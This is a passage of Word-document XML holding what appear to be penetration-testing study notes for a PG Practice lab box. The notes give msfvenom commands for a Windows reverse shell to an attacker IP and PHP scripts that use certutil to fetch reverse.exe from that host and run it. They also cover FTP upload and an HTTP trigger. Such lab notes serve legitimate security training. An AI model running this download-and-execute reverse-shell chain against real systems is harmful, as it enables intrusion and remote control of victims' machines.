        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=1234 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001409">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.243 LPORT=1234 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/shell_reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/shell_reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, it is important to note that sometimes 32-bit stuff can run on 64-bit architecture! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You are using msfvenom to create a Windows executable (reverse.exe) that, when run, connects back (reverse shell) to your Kali machine (192.168.49.243) on port 1234.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output format: exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepare PHP scripts to deliver &amp; execute the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001410">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001411">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You create two PHP scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001412">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001413">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001414">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001415">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$download = system('certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001416">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1417">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses Windows built-in certutil.exe to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001418">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-urlcache -split -f: download a file from a remote URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001419">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads your reverse shell executable (reverse.exe) from your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saves it as reverse.exe on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So this script pulls the malware onto the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001420">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001421">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe on the victim machine, triggering the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001422">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001423">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId380">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw another run.php file</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001424">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001425">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('C:/Users/Jerren/Desktop/reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$val </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an optional second parameter to system().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001428">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It captures the exit status code of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001429">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="998"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Upload scripts onto FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You use FTP to upload upload.php and run.php to the folder that's:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable via FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001430">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessible via web server (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001431">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001432">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001433">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001434">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001435">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001436">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Trigger the scripts via web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit in browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001439">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/upload.ph</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143A">
